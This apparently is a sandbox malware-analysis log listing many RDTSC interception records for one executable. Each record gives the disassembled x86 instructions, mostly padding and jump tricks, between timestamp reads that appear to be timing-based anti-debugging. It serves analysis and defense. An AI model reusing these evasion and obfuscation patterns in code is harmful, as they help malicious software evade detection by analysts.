Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0AA8 second address: FC0B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F0D84D6201Ch 0x0000000d push 00000000h 0x0000000f movsx esi, cx 0x00000012 push C557B7A8h 0x00000017 jmp 00007F0D84D62026h 0x0000001c add dword ptr [esp], 3AA848D8h 0x00000023 jnc 00007F0D84D6201Bh 0x00000029 or cx, CB62h 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0D84D62018h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push edx 0x0000004b xor dword ptr [ebp+122D36BDh], esi 0x00000051 pop esi 0x00000052 add si, 0124h 0x00000057 push 00000000h 0x00000059 clc 0x0000005a push 00000003h 0x0000005c add edi, 22F52181h 0x00000062 push 9A50CA96h 0x00000067 push eax 0x00000068 push edx 0x00000069 push ebx 0x0000006a jmp 00007F0D84D62026h 0x0000006f pop ebx 0x00000070 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE0187 second address: FE0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D8517B906h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE0195 second address: FE019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE019D second address: FE01A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE4EE second address: FDE4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE4FD second address: FDE503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE503 second address: FDE507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE647 second address: FDE64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE64B second address: FDE65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D6201Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE65D second address: FDE66D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D8517B912h 0x00000008 jns 00007F0D8517B906h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7B1 second address: FDE7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7B9 second address: FDE7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7BD second address: FDE7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0D84D62016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7C9 second address: FDE7E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B915h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7E6 second address: FDE7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7EA second address: FDE81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D8517B916h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE81D second address: FDE837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE837 second address: FDE849 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D8517B908h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0D8517B906h 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDECF8 second address: FDED02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D84D62016h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDED02 second address: FDED06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDEE7D second address: FDEE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF12B second address: FDF131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF40B second address: FDF426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007F0D84D62016h 0x0000000c popad 0x0000000d push esi 0x0000000e jl 00007F0D84D62016h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF426 second address: FDF42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF42C second address: FDF430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF9BE second address: FDF9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF9C4 second address: FDF9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE230D second address: FE2311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE2311 second address: FE2323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F0D84D62016h 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FA5A86 second address: FA5AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jc 00007F0D8517B908h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F0D8517B90Ch 0x00000016 push edi 0x00000017 jp 00007F0D8517B906h 0x0000001d jc 00007F0D8517B906h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE4654 second address: FE465A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE465A second address: FE465F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE3152 second address: FE3156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE3156 second address: FE315C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEB2BE second address: FEB2D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA794 second address: FEA79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA79A second address: FEA7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F0D84D62016h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA912 second address: FEA916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA916 second address: FEA920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA920 second address: FEA924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA924 second address: FEA928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAA4D second address: FEAA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAA53 second address: FEAA6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0D84D62028h 0x0000000c jmp 00007F0D84D6201Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAF92 second address: FEAFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B913h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAFAA second address: FEAFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D84D62027h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAFC6 second address: FEAFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAFD0 second address: FEAFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEE3A8 second address: FEE3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEE837 second address: FEE83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEE83B second address: FEE846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEEB9D second address: FEEBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEF06F second address: FEF073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEF75E second address: FEF762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF0535 second address: FF055A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D8517B91Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF20E6 second address: FF20F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jns 00007F0D84D6201Eh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF2DF4 second address: FF2DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF2DF8 second address: FF2DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF2DFC second address: FF2E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF2E02 second address: FF2E93 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D84D6201Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F0D84D62018h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 jbe 00007F0D84D6201Ch 0x0000002d jno 00007F0D84D62016h 0x00000033 xor si, C3C1h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F0D84D62018h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 add dword ptr [ebp+122D193Fh], ebx 0x0000005a push 00000000h 0x0000005c sub esi, 61B67E40h 0x00000062 push eax 0x00000063 pushad 0x00000064 jng 00007F0D84D6201Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F0D84D62016h 0x00000072 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF3634 second address: FF364D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B915h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF4194 second address: FF419B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF6BDD second address: FF6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF6BE3 second address: FF6BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF6BE7 second address: FF6C1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0D8517B906h 0x0000000d jns 00007F0D8517B906h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 jmp 00007F0D8517B917h 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF97E5 second address: FF97EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF9A33 second address: FF9A4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D8517B911h 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFD2BC second address: FFD2D7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D84D62018h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F0D84D62022h 0x00000013 jl 00007F0D84D6201Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1002FF5 second address: 1003003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1003003 second address: 1003025 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e mov edi, 27F6B101h 0x00000013 push 00000000h 0x00000015 stc 0x00000016 mov dword ptr [ebp+122D1871h], ebx 0x0000001c push eax 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1006681 second address: 1006685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1006685 second address: 100668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100668F second address: 10066FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B90Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edi, bx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F0D8517B908h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov dword ptr [ebp+124629FFh], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F0D8517B908h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFE036 second address: FFE0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0D84D62018h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D21A7h], ecx 0x0000002a sub dword ptr [ebp+122D2216h], ecx 0x00000030 or edi, dword ptr [ebp+1244C5CFh] 0x00000036 push dword ptr fs:[00000000h] 0x0000003d mov dword ptr [ebp+122D1933h], edx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov edi, edx 0x0000004c mov eax, dword ptr [ebp+122D10D9h] 0x00000052 mov edi, edx 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007F0D84D62018h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 00000017h 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 clc 0x00000071 mov edi, dword ptr [ebp+122D1BCFh] 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F0D84D62025h 0x0000007f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFEFD5 second address: FFEFDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100001E second address: 1000022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFE0D5 second address: FFE0DF instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D8517B90Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFEFDB second address: FFEFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D84D6201Ch 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1000022 second address: 100002C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1002202 second address: 1002207 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFEFEB second address: FFEFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1002207 second address: 1002218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F0D84D62016h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100FDE4 second address: 100FDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FA90BF second address: FA90C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10197AA second address: 10197BC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F0D8517B908h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10197BC second address: 10197C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 102251E second address: 1022528 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D8517B90Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022ABA second address: 1022AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0D84D6201Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1022AC7 second address: 1022AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B917h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c jo 00007F0D8517B906h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F0D8517B906h 0x0000001b rdtsc
